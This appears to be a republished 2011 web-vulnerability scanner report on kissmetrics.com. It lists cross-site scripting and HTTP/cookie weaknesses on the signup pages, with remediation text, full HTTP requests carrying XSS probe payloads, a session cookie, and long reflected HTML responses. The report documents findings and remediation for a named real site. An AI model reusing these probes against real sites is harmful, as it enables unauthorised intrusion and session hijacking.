kissmetrics.com, XSS, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS in KissMetrics.com Report | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
Netsparker - DORK Report Summary
TARGET URL
 https://www.kissmetrics.com/privacy
DORK DATE
 8/28/2011 3:34:54 PM
REPORT DATE
 8/28/2011 6:18:34 PM
DORK DURATION
 00:39:11

Total Requests

Average Speed

req/sec.
17
identified
8
confirmed
0
critical
2
informational

DORK SETTINGS

DORK Settings
PROFILE
 Previous Settings
ENABLED ENGINES
 XSS
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security DORKner
IMPORTANT
35 %
MEDIUM
35 %
LOW
18 %
INFORMATION
12 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/login Critical Form Served Over HTTP Yes
/privacy Password Transmitted Over HTTP Yes
Cookie Not Marked As Secure Yes
Weak Ciphers Detected Yes
Auto Complete Enabled Yes
Cookie Not Marked As HttpOnly Yes
E-mail Address Disclosure No
/signup account%5bmeta%5d%5burl%5d POST Cross-site Scripting No
account%5Bmeta%5D%5Burl%5D POST Cross-site Scripting No
account%5bmeta%5d%5burl%5d POST [Possible] Cross-site Scripting No
account%5Bmeta%5D%5Burl%5D POST [Possible] Cross-site Scripting No
Internal Server Error Yes
/signup/enterprise request%5bemail%5d POST Cross-site Scripting No
request%5Bemail%5D POST Cross-site Scripting No
request%5bemail%5d POST [Possible] Cross-site Scripting No
request%5Bemail%5D POST [Possible] Cross-site Scripting No
/stylesheets/external/ Forbidden Resource Yes
Cross-site Scripting

Cross-site Scripting
4 TOTAL
IMPORTANT
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /signup

/signup

https://www.kissmetrics.com/signup

Parameters

Parameter Type Value
trp POST 30
account%5bmeta%5d%5bname%5d POST Smith
account%5bname%5d POST Smith
account%5bmeta%5d%5bcompany_size%5d POST 1 to 5 people
account%5bmeta%5d%5burl%5d POST '" ns= alert(0x0004EF)
user%5blogin%5d POST 3
account%5bmeta%5d%5bphone%5d POST 3
user%5bnew_password%5d POST 3

Request

POST /signup HTTP/1.1
Referer: https://www.kissmetrics.com/signup/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 254
Expect: 100-continue
Accept-Encoding: gzip, deflate

trp=30&account%5bmeta%5d%5bname%5d=Smith&account%5bname%5d=Smith&account%5bmeta%5d%5bcompany_size%5d=1+to+5+people&account%5bmeta%5d%5burl%5d=%27%22%20ns=%20netsparker(0x0004EF)%20&user%5blogin%5d=3&account%5bmeta%5d%5bphone%5d=3&user%5bnew_password%5d=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:52:54 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>Sign up for KISSmetrics - 30 day free trial</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="Experience the most powerful Web Analytics. There’s no risk, no obligation and no credit card required. You can cancel your account at any time." /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" href="/stylesheets/external/signup.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="/stylesheets/external/concentrate.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav active"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> <div class="title"> <h1>Sign up<span class="colon">:</span> <small>Start your free 30 day trial now</small></h1> <p class="call">Call us at <strong>+1 (888) 767-5477</strong> to have a chat.</p></div><!-- /.title --><hr /><ul class="sub_nav"> <li class="trial_sub_nav active"> <a href="/signup"><strong>Start your free 30 day trial</strong><br />No risk, no obligation, no credit card required.</a> </li> <li class="pricing_sub_nav"> <a href="/signup/pricing"><strong>Pricing options</strong><br />Flexible month to month pricing plans.</a> </li> <li class="enterprise_sub_nav"> <a href="/signup/enterprise"><strong>Request a demo</strong><br />To see how it works, let&rsquo;s talk.</a> </li></ul> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="title"> <h2>Start your free 30 day trial</h2> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p></div><!-- /.title --><div class="trial col"> <!--<h3>Improve your conversion rate and increase your revenue&hellip;starting now.</h3> <p>KISSmetrics is focused in improving the metrics that really matter to your business.</p>--> <form action="/signup" method="post" id="signup_form"> <input name="trp" value="30" type="hidden"/> <h3>KISSmetrics free trial sign up</h3> <p>You are only a few steps away from starting your free KISSmetrics trial. Create an account name and password and you&rsquo;ll be all set.</p> <hr class="thin" /> <fieldset> <p> <label for="your_name">Your name:</label> <input class="text" name="account[meta][name]" value="Smith" id="your_name" type="text"/> </p> <p class="half"> <label for="account_name">Company name:</label> <input class="text" name="account[name]" value="Smith" id="account_name" type="text"/> </p> <p class="half"> <label for="account[meta][company_size]">Company size:</label> <select name="account[meta][company_size]"><option value="1 to 5 people" selected="selected">1 to 5 people</option><option value="6 to 10 people">6 to 10 people</option><option value="11 to 25 people">11 to 25 people</option><option value="26 to 50 people">26 to 50 people</option><option value="51 to 200 people">51 to 200 people</option><option value="201 or more people">201 or more people</option></select> </p> <p class="clear"> <label for="account[meta][url]">Company Website:</label> <input type="text" class="text" name="account[meta][url]" value="'" ns= netsparker(0x0004EF) " /> </p> <p class="half"> <label for="email">Email address:</label> <input class="text" name="user[login]" value="3" id="email" type="text"/> <span class="error">E-mail does not appear to be valid</span> </p> <p class="half"> <label for="account[meta][phone]">Telephone number:</label> <input class="text" name="account[meta][phone]" value="3" type="text"/> </p> <p class="clear"> <label for="password">Password:</label> <input class="text" name="user[new_password]" value="" id="new_password" type="password"/> <span class="error">New password must be at least 5 chars</span> </p> <div style="visibility:none;overflow:hidden;height:0;width:0;"><input type="submit" value="Submit" /></div> <p> <a href="#" onclick="if(!this.submitted){this.submitted=true;$('#signup_form').submit();} return false" class="blue button with_arrow">Create my account</a> <span class="note">By clicking the button above, you are agreeing with our <a href="/terms" target="_blank">Terms</a>.</span> </p> </fieldset> </form></div><!-- /.col --><div class="trial col side"> <p>Does your site have a huge number of active customers? Congratulations! We can handle it. KISSmetrics is already serving a number of customers who are sending us the actions of millions of people per day. <a href="/signup/enterprise">Contact us for more information.</a></p></div><!-- /.trial.col.side --><!--<hr /><ul class="faq"> <li> <h3>How does the 30-day free trial work?</h3> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p> </li> <li> <h3>What if I go over my plan limits?</h3> <p>During the 30-day free trial there are no overage fees. After the 30-day trial is over you will not be charged any overage fees for the first month that you go over. You can upgrade to a higher plan and you will be charged for that plan starting with the next billing cycle.</p> </li> <li> <h3>Can I change plans at any time?</h3> <p>Changing plans is really simple. You can upgrade or downgrade your plan at any time. If you are upgrading to a higher plan, you will be upgraded immediately but not be charged until the next billing cycle.</p> </li> <li> <h3>Is there a minimum commitment?</h3> <p>KISSmetrics is a month to month service. There is no contract or long term obligation. You are billed on a monthly basis, and if you cancel you will not be billed again.</p> </li> <li> <h3>What are my payment options?</h3> <p>We accept Visa, Mastercard, American Express and Discover through our online payment system. If you would like to prepay for 12 months you can pay with an invoice. Please contact us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a> for more information.</p> </li> <li> <h3>Where can I review the terms of service and privacy policy?</h3> <p>Here are our <a href="/terms">Terms of Service</a> and <a href="/privacy">Privacy Policy</a>.</p> </li></ul>--><br style="clear:both;" /> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" target="_new" title="Visit the KISSmetrics Marketing Blog">Blog</a></li> <li><a href="/contact" title="Contact us">Contact</a></li> <li><a href="http://support.kissmetrics.com" target="_new" title="Visit our support site">Help</a></li> <li><a href="/terms" title="Terms of Use">Terms of Use</a></li> <li><a href="/privacy" title="Privacy Policy">Privacy Policy</a></li> <!--<li><a href="/security">Security</a></li>--> </ul> </nav> </div> </section> <section class="about cf"> <div class="inner"> <div class="col detail"> <h3>What is KISSmetrics?</h3> <p>Use KISSmetrics to increase purchases on your website by visualizing your online sales funnels and figuring out which campaigns are driving revenue and which ones aren&rsquo;t. <a href="/what">Learn more about how we can help you</a>.</p> <h3>Want to have a chat? Call us at <strong>+1 (888) 767-5477</strong></h3> <p>or email us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a>.</p> </div><!-- /.col --> <div class="col gdd"> <h3>We also provide free tools to help you get started on your path to becoming data driven</h3> <p><img src="/images/external/get_data_driven.png" height="52" width="187" alt="Get Data Driven" />Ever wonder how much revenue you could gain with a 5% improvement on your conversion rate? At KISSmetrics, we are working on giving you the tools to start driving your decisions with data. <a href="http://getdatadriven.com/" target="_new">Get Data Driven, subscribe to our weekly email newsletter</a>.</p> <!--<h3>Overheard on Twitter</h3> <ul class="overheard"> <li> <strong class="by"><a href="#">6 hours ago by Melody McCloskey</a></strong> <br /> Deep dive into KISSmetrics to measure our funnels/user paths, so far I’m impressed! </li> <li> <strong class="by"><a href="#">23 hours ago by gabyingreen</a></strong> <br /> I just love Inforgraphics! Check out this infographic by @KISSmetrics showing @Twitter&rsquo;s growth statistics <a href="#">http://kiss.ly/esKzFU</a> #measure </li> </ul>--> </div><!-- /.col --> </div><!-- /.inner --> </section> <div class="inner"> <p class="copyright">&copy; Copyright 2011 KISSmetrics. All rights reserved.</p> <a href="/signup" class="teal button with_arrow" title="Get started with KISSmetrics today!">Get started with KISSmetrics today!</a> </div><!-- /.inner --> </footer> <div id="signin_modal" style="display: none"> <div class="modal"> <div class="modal-inner" id="signin_content"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Sign into KISSmetrics</h3> </div> <div class="content"> <form action="/login" id="signin_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p> <label for="email">Password:</label> <input type="password" class="text" name="password" id="password" /><br /> <span class="forgot"><a href="#">Forgot password?</a></span> </p> <p class="buttons"><a href="#" onclick="$('#signin_form').submit(); return false;" class="blue button with_arrow">Sign in</a> <input type="checkbox" name="remember_me" value="1" checked="checked" /> Keep me signed in for two weeks</p> </form> </div> </div> <div class="modal-inner" id="forgot_content" style="display:none;"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Forgot your password?</h3> </div> <div class="content"> <p>Enter your email address below and we&rsquo;ll send you instructions.</p> <hr /> <form action="/forgot_password" id="forgot_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="te..
- /signup

/signup

https://www.kissmetrics.com/signup

Parameters

Parameter Type Value
trp POST 30
account%5Bmeta%5D%5Bname%5D POST Smith
account%5Bname%5D POST Smith
account%5Bmeta%5D%5Burl%5D POST '" ns= alert(0x0004F1)
user%5Blogin%5D POST 3
account%5Bmeta%5D%5Bphone%5D POST 3
user%5Bnew_password%5D POST 3

Request

POST /signup HTTP/1.1
Referer: https://www.kissmetrics.com/signup/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 204
Expect: 100-continue
Accept-Encoding: gzip, deflate

trp=30&account%5Bmeta%5D%5Bname%5D=Smith&account%5Bname%5D=Smith&account%5Bmeta%5D%5Burl%5D=%27%22%20ns=%20netsparker(0x0004F1)%20&user%5Blogin%5D=3&account%5Bmeta%5D%5Bphone%5D=3&user%5Bnew_password%5D=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:53:52 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>Sign up for KISSmetrics - 30 day free trial</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="Experience the most powerful Web Analytics. There’s no risk, no obligation and no credit card required. You can cancel your account at any time." /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" href="/stylesheets/external/signup.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="/stylesheets/external/concentrate.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav active"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> <div class="title"> <h1>Sign up<span class="colon">:</span> <small>Start your free 30 day trial now</small></h1> <p class="call">Call us at <strong>+1 (888) 767-5477</strong> to have a chat.</p></div><!-- /.title --><hr /><ul class="sub_nav"> <li class="trial_sub_nav active"> <a href="/signup"><strong>Start your free 30 day trial</strong><br />No risk, no obligation, no credit card required.</a> </li> <li class="pricing_sub_nav"> <a href="/signup/pricing"><strong>Pricing options</strong><br />Flexible month to month pricing plans.</a> </li> <li class="enterprise_sub_nav"> <a href="/signup/enterprise"><strong>Request a demo</strong><br />To see how it works, let&rsquo;s talk.</a> </li></ul> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="title"> <h2>Start your free 30 day trial</h2> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p></div><!-- /.title --><div class="trial col"> <!--<h3>Improve your conversion rate and increase your revenue&hellip;starting now.</h3> <p>KISSmetrics is focused in improving the metrics that really matter to your business.</p>--> <form action="/signup" method="post" id="signup_form"> <input name="trp" value="30" type="hidden"/> <h3>KISSmetrics free trial sign up</h3> <p>You are only a few steps away from starting your free KISSmetrics trial. Create an account name and password and you&rsquo;ll be all set.</p> <hr class="thin" /> <fieldset> <p> <label for="your_name">Your name:</label> <input class="text" name="account[meta][name]" value="Smith" id="your_name" type="text"/> </p> <p class="half"> <label for="account_name">Company name:</label> <input class="text" name="account[name]" value="Smith" id="account_name" type="text"/> </p> <p class="half"> <label for="account[meta][company_size]">Company size:</label> <select name="account[meta][company_size]"><option value="1 to 5 people">1 to 5 people</option><option value="6 to 10 people">6 to 10 people</option><option value="11 to 25 people">11 to 25 people</option><option value="26 to 50 people">26 to 50 people</option><option value="51 to 200 people">51 to 200 people</option><option value="201 or more people">201 or more people</option></select> </p> <p class="clear"> <label for="account[meta][url]">Company Website:</label> <input type="text" class="text" name="account[meta][url]" value="'" ns= netsparker(0x0004F1) " /> </p> <p class="half"> <label for="email">Email address:</label> <input class="text" name="user[login]" value="3" id="email" type="text"/> <span class="error">E-mail does not appear to be valid</span> </p> <p class="half"> <label for="account[meta][phone]">Telephone number:</label> <input class="text" name="account[meta][phone]" value="3" type="text"/> </p> <p class="clear"> <label for="password">Password:</label> <input class="text" name="user[new_password]" value="" id="new_password" type="password"/> <span class="error">New password must be at least 5 chars</span> </p> <div style="visibility:none;overflow:hidden;height:0;width:0;"><input type="submit" value="Submit" /></div> <p> <a href="#" onclick="if(!this.submitted){this.submitted=true;$('#signup_form').submit();} return false" class="blue button with_arrow">Create my account</a> <span class="note">By clicking the button above, you are agreeing with our <a href="/terms" target="_blank">Terms</a>.</span> </p> </fieldset> </form></div><!-- /.col --><div class="trial col side"> <p>Does your site have a huge number of active customers? Congratulations! We can handle it. KISSmetrics is already serving a number of customers who are sending us the actions of millions of people per day. <a href="/signup/enterprise">Contact us for more information.</a></p></div><!-- /.trial.col.side --><!--<hr /><ul class="faq"> <li> <h3>How does the 30-day free trial work?</h3> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p> </li> <li> <h3>What if I go over my plan limits?</h3> <p>During the 30-day free trial there are no overage fees. After the 30-day trial is over you will not be charged any overage fees for the first month that you go over. You can upgrade to a higher plan and you will be charged for that plan starting with the next billing cycle.</p> </li> <li> <h3>Can I change plans at any time?</h3> <p>Changing plans is really simple. You can upgrade or downgrade your plan at any time. If you are upgrading to a higher plan, you will be upgraded immediately but not be charged until the next billing cycle.</p> </li> <li> <h3>Is there a minimum commitment?</h3> <p>KISSmetrics is a month to month service. There is no contract or long term obligation. You are billed on a monthly basis, and if you cancel you will not be billed again.</p> </li> <li> <h3>What are my payment options?</h3> <p>We accept Visa, Mastercard, American Express and Discover through our online payment system. If you would like to prepay for 12 months you can pay with an invoice. Please contact us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a> for more information.</p> </li> <li> <h3>Where can I review the terms of service and privacy policy?</h3> <p>Here are our <a href="/terms">Terms of Service</a> and <a href="/privacy">Privacy Policy</a>.</p> </li></ul>--><br style="clear:both;" /> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" target="_new" title="Visit the KISSmetrics Marketing Blog">Blog</a></li> <li><a href="/contact" title="Contact us">Contact</a></li> <li><a href="http://support.kissmetrics.com" target="_new" title="Visit our support site">Help</a></li> <li><a href="/terms" title="Terms of Use">Terms of Use</a></li> <li><a href="/privacy" title="Privacy Policy">Privacy Policy</a></li> <!--<li><a href="/security">Security</a></li>--> </ul> </nav> </div> </section> <section class="about cf"> <div class="inner"> <div class="col detail"> <h3>What is KISSmetrics?</h3> <p>Use KISSmetrics to increase purchases on your website by visualizing your online sales funnels and figuring out which campaigns are driving revenue and which ones aren&rsquo;t. <a href="/what">Learn more about how we can help you</a>.</p> <h3>Want to have a chat? Call us at <strong>+1 (888) 767-5477</strong></h3> <p>or email us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a>.</p> </div><!-- /.col --> <div class="col gdd"> <h3>We also provide free tools to help you get started on your path to becoming data driven</h3> <p><img src="/images/external/get_data_driven.png" height="52" width="187" alt="Get Data Driven" />Ever wonder how much revenue you could gain with a 5% improvement on your conversion rate? At KISSmetrics, we are working on giving you the tools to start driving your decisions with data. <a href="http://getdatadriven.com/" target="_new">Get Data Driven, subscribe to our weekly email newsletter</a>.</p> <!--<h3>Overheard on Twitter</h3> <ul class="overheard"> <li> <strong class="by"><a href="#">6 hours ago by Melody McCloskey</a></strong> <br /> Deep dive into KISSmetrics to measure our funnels/user paths, so far I’m impressed! </li> <li> <strong class="by"><a href="#">23 hours ago by gabyingreen</a></strong> <br /> I just love Inforgraphics! Check out this infographic by @KISSmetrics showing @Twitter&rsquo;s growth statistics <a href="#">http://kiss.ly/esKzFU</a> #measure </li> </ul>--> </div><!-- /.col --> </div><!-- /.inner --> </section> <div class="inner"> <p class="copyright">&copy; Copyright 2011 KISSmetrics. All rights reserved.</p> <a href="/signup" class="teal button with_arrow" title="Get started with KISSmetrics today!">Get started with KISSmetrics today!</a> </div><!-- /.inner --> </footer> <div id="signin_modal" style="display: none"> <div class="modal"> <div class="modal-inner" id="signin_content"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Sign into KISSmetrics</h3> </div> <div class="content"> <form action="/login" id="signin_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p> <label for="email">Password:</label> <input type="password" class="text" name="password" id="password" /><br /> <span class="forgot"><a href="#">Forgot password?</a></span> </p> <p class="buttons"><a href="#" onclick="$('#signin_form').submit(); return false;" class="blue button with_arrow">Sign in</a> <input type="checkbox" name="remember_me" value="1" checked="checked" /> Keep me signed in for two weeks</p> </form> </div> </div> <div class="modal-inner" id="forgot_content" style="display:none;"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Forgot your password?</h3> </div> <div class="content"> <p>Enter your email address below and we&rsquo;ll send you instructions.</p> <hr /> <form action="/forgot_password" id="forgot_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> <..
- /signup/enterprise

/signup/enterprise

https://www.kissmetrics.com/signup/enterprise

Parameters

Parameter Type Value
request%5bfirst_name%5d POST Smith
request%5blast_name%5d POST Smith
request%5bcompany%5d POST 3
request%5bcompany_size%5d POST 1 to 5 people
request%5burl%5d POST 3
request%5bemail%5d POST '" ns= alert(0x0006C3)
request%5bphone%5d POST 3

Request

POST /signup/enterprise HTTP/1.1
Referer: https://www.kissmetrics.com/signup/enterprise
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 219
Expect: 100-continue
Accept-Encoding: gzip, deflate

request%5bfirst_name%5d=Smith&request%5blast_name%5d=Smith&request%5bcompany%5d=3&request%5bcompany_size%5d=1+to+5+people&request%5burl%5d=3&request%5bemail%5d=%27%22%20ns=%20netsparker(0x0006C3)%20&request%5bphone%5d=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 21:04:50 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


